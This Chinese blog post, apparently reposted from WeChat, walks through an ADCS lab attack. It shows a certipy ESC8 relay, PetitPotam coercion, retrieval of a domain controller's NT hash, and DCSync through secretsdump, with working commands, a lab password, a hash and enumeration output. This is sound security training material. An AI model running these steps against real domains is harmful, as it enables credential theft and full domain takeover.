ESC8 with certipy + ADCS
ESC8 with certipy
•Oliver Lyak 在 ADCS 攻击工具 certipy•certipy ,设置listener:
sudo certipy relay -ca 192.168.56.23 -template DomainController
•像之前对 petitpotam ,触发coerce
sudo python3 PetitPotam.py 192.168.56.109 meereen.essos.local
•获得了证书meereen.pfx,可以使用以下命令获取 DC 的 NT 哈希以及 TGT:
certipy auth -pfx meereen.pfx -dc-ip 192.168.56.12
wulala@wulala-VirtualBox:~/intranet-tools/Certipy-4.4.0$ sudo certipy auth -pfx meereen.pfx -dc-ip 192.168.56.12
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Using principal: meereen$@essos.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'meereen.ccache'
[*] Trying to retrieve NT hash for 'meereen$'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:a67ca990438d4a00ff68f68132c9bd77
•同上,我们可以使用 secretsdump 和我们得到的ticket启动 DCsync
sudo -s
export KRB5CCNAME=meereen.ccache
python3 /home/wulala/intranet-tools/myimpacket/examples/secretsdump.py -k -no-pass ESSOS.LOCAL/'meereen$'@meereen.essos.local
•或者使用hash
内网PTH攻击 - 先知社区 (aliyun.com)
python3 /home/wulala/intranet-tools/myimpacket/examples/secretsdump.py -hashes 'aad3b435b51404eeaad3b435b51404ee:a67ca990438d4a00ff68f68132c9bd77' -no-pass ESSOS.LOCAL/'meereen$'@meereen.essos.local
ADCS - reconnaissance and enumeration
使用certipy和bloodhound对ADCS的扫描和枚举
How To Install and Configure Neo4j on Ubuntu 20.04 | DigitalOcean
AD CS – 哪些内容可能配置错误?– HTTP418信息安全 (http418infosec.com)
AD CS – The ‘Certified Pre-Owned’ Attacks – HTTP418InfoSec
•使用certipy开始枚举
certipy find -u khal.drogo@essos.local -p 'horse' -dc-ip 192.168.56.12
#这个生成的用https://github.com/ly4k/BloodHound/releases/download/ 这个老哥的,他增加了相关的search
certipy find -u khal.drogo@essos.local -p 'horse' -dc-ip 192.168.56.12 -old-bloodhound #使用这个可以正常导入 正常安装的
[*] Saved BloodHound data to '20230524135954_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20230524135954_Certipy.txt'
[*] Saved JSON output to '20230524135954_Certipy.json'
这将搜索证书服务器,并以三种格式转储所需的所有信息:
bloodhound :准备导入 bloodhound 的 zip(如果您使用 certipy 4.0,则必须安装由 oliver lyak 修改的 bloodhound gui,如果您不想使用修改后的版本,则必须使用 -old-bloodhound 选项)
json : json格式的信息
txt :文本格式
cd ~/intranet-tools
wget https://github.com/ly4k/BloodHound/releases/download/v4.2.0-ly4k/BloodHound-linux-x64.zip
unzip BloodHound-linux-x64.zip -d BloodHound
rm BloodHound-linux-x64.zip
#install neo4j neo4j/1qaz1qaz
neo4j start
./BloodHound --no-sandbox --disable-dev-shm-usage
#前面做了相同的不继续再ubuntu上进行安装了。•Certipy 4.0 还重新引入了 -vulnerable 选项来扫描哪些是可以攻击的(payload)。
certipy find -u khal.drogo@essos.local -p 'horse' -vulnerable -dc-ip 192.168.56.12 -stdout
details
root@wulala-VirtualBox:/home/wulala/intranet-tools/Certipy-4.4.0# sudo certipy find -u [email protected] -p 'horse' -vulnerable -dc-ip 192.168.56.12 -stdout
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 38 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 16 enabled certificate templates
[*] Trying to get CA configuration for 'ESSOS-CA' via CSRA
[*] Got CA configuration for 'ESSOS-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : ESSOS-CA
DNS Name : braavos.essos.local
Certificate Subject : CN=ESSOS-CA, DC=essos, DC=local
Certificate Serial Number : 136E773F913158B942E0FB8D7FDC976E
Certificate Validity Start : 2023-04-26 12:53:26+00:00
Certificate Validity End : 2028-04-26 13:03:25+00:00
Web Enrollment : Enabled
User Specified SAN : Enabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : ESSOS.LOCALAdministrators
Access Rights
ManageCertificates : ESSOS.LOCALAdministrators
ESSOS.LOCALDomain Admins
ESSOS.LOCALEnterprise Admins
ManageCa : ESSOS.LOCALAdministrators
ESSOS.LOCALDomain Admins
ESSOS.LOCALEnterprise Admins
Enroll : ESSOS.LOCALAuthenticated Users
[!] Vulnerabilities
ESC6 : Enrollees can specify SAN and Request Disposition is set to Issue. Does not work after May 2022
ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates
0
Template Name : ESC4
Display Name : ESC4
Certificate Authorities : ESSOS-CA
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireDirectoryPath
SubjectRequireEmail
SubjectAltRequireUpn
Enrollment Flag : AutoEnrollment
PublishToDs
PendAllRequests
IncludeSymmetricAlgorithms
Private Key Flag : 16777216
65536
ExportableKey
Extended Key Usage : Code Signing
Requires Manager Approval : True
Requires Key Archival : False
Authorized Signatures Required : 1
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : ESSOS.LOCALDomain Users
Object Control Permissions
Owner : ESSOS.LOCALEnterprise Admins
Full Control Principals : ESSOS.LOCALDomain Admins
ESSOS.LOCALkhal.drogo
ESSOS.LOCALLocal System
ESSOS.LOCALEnterprise Admins
Write Owner Principals : ESSOS.LOCALDomain Admins
ESSOS.LOCALkhal.drogo
ESSOS.LOCALLocal System
ESSOS.LOCALEnterprise Admins
Write Dacl Principals : ESSOS.LOCALDomain Admins
ESSOS.LOCALkhal.drogo
ESSOS.LOCALLocal System
ESSOS.LOCALEnterprise Admins
Write Property Principals : ESSOS.LOCALDomain Admins
ESSOS.LOCALkhal.drogo
ESSOS.LOCALLocal System
ESSOS.LOCALEnterprise Admins
[!] Vulnerabilities
ESC4 : 'ESSOS.LOCAL\khal.drogo' has dangerous permissions
1
Template Name : ESC3-CRA
Display Name : ESC3-CRA
Certificate Authorities : ESSOS-CA
Enabled : True
Client Authentication : False
Enrollment Agent : True
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireUpn
Enrollment Flag : AutoEnrollment
Private Key Flag : 16777216
65536
Extended Key Usage : Certificate Request Agent
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : ESSOS.LOCALDomain Users
Object Control Permissions
Owner : ESSOS.LOCALEnterprise Admins
Full Control Principals : ESSOS.LOCALDomain Admins
ESSOS.LOCALLocal System
ESSOS.LOCALEnterprise Admins
Write Owner Principals : ESSOS.LOCALDomain Admins
ESSOS.LOCALLocal System
ESSOS.LOCALEnterprise Admins
Write Dacl Principals : ESSOS.LOCALDomain Admins
ESSOS.LOCALLocal System
ESSOS.LOCALEnterprise Admins
Write Property Principals : ESSOS.LOCALDomain Admins
ESSOS.LOCALLocal System
ESSOS.LOCALEnterprise Admins
[!] Vulnerabilities
ESC3 : 'ESSOS.LOCAL\Domain Users' can enroll and template has Certificate Request Agent EKU set
2
Template Name : ESC2
Display Name : ESC2
Certificate Authorities : ESSOS-CA
Enabled : True
Client Authentication : True
Enrollment Agent : True
Any Purpose : True
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireUpn
Enrollment Flag : AutoEnrollment
Private Key Flag : 16777216
65536
Extended Key Usage : Any Purpose
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : ESSOS.LOCALDomain Users
Object Control Permissions
Owner : ESSOS.LOCALEnterprise Admins
Full Control Principals : ESSOS.LOCALDomain Admins
ESSOS.LOCALLocal System
ESSOS.LOCALEnterprise Admins
Write Owner Principals : ESSOS.LOCALDomain Admins
ESSOS.LOCALLocal System
ESSOS.LOCALEnterprise Admins
Write Dacl Principals : ESSOS.LOCALDomain Admins
ESSOS.LOCALLocal System
ESSOS.LOCALEnterprise Admins
Write Property Principals : ESSOS.LOCALDomain Admins
ESSOS.LOCALLocal System
ESSOS.LOCALEnterprise Admins
[!] Vulnerabilities
ESC2 : 'ESSOS.LOCAL\Domain Users' can enroll and template can be used for any purpose
ESC3 : 'ESSOS.LOCAL\Domain Users' can enroll and template has Certificate Request Agent EKU set
3
Template Name : ESC1
Display Name : ESC1
Certificate Authorities : ESSOS-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16777216
65536
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : ESSOS.LOCALDomain Users
Object Control Permissions
Owner : ESSOS.LOCALEnterprise Admins
Full Control Principals : ESSOS.LOCALDomain Admins
ESSOS.LOCALLocal System
ESSOS.LOCALEnterprise Admins
Write Owner Principals : ESSOS.LOCALDomain Admins
ESSOS.LOCALLocal System
ESSOS.LOCALEnterprise Admins
Write Dacl Principals : ESSOS.LOCALDomain Admins
ESSOS.LOCALLocal System
ESSOS.LOCALEnterprise Admins
Write Property Principals : ESSOS.LOCALDomain Admins
ESSOS.LOCALLocal System
ESSOS.LOCALEnterprise Admins
[!] Vulnerabilities
ESC1 : 'ESSOS.LOCAL\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
root@wulala-VirtualBox:/home/wulala/intranet-tools/Certipy-4.4.0# •ESC1 漏洞攻击的模板 :•Enrollment rights to all domain users•Client authentication•And Enrollee supplies subject
还有ESC2,然后,wp直接在ubuntu上开了BloodHound,导入certipy生成的zip
#这里不用原版的BloodHood,用ly4k的,他里面增加PKI相关的Analysis
cd /opt/tools
wget https://github.com/ly4k/BloodHound/releases/download/v4.2.0-ly4k/BloodHound-linux-x64.zip
unzip BloodHound-linux-x64.zip -d BloodHound4.2-ly4k
rm BloodHound-linux-x64.zip
neo4j start
/opt/tools/BloodHound4.2-ly4k/BloodHound-linux-x64/BloodHound --no-sandbox --disable-dev-shm-usage速览一下 :
1.PKI->Find certificate authority,2.选中 certificate authority然后点击 : “see enabled templates”
根据官方的wp,找到ESC4,也能看到
原文始发于微信公众号(wulala520):ESC8 with certipy + ADCS
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论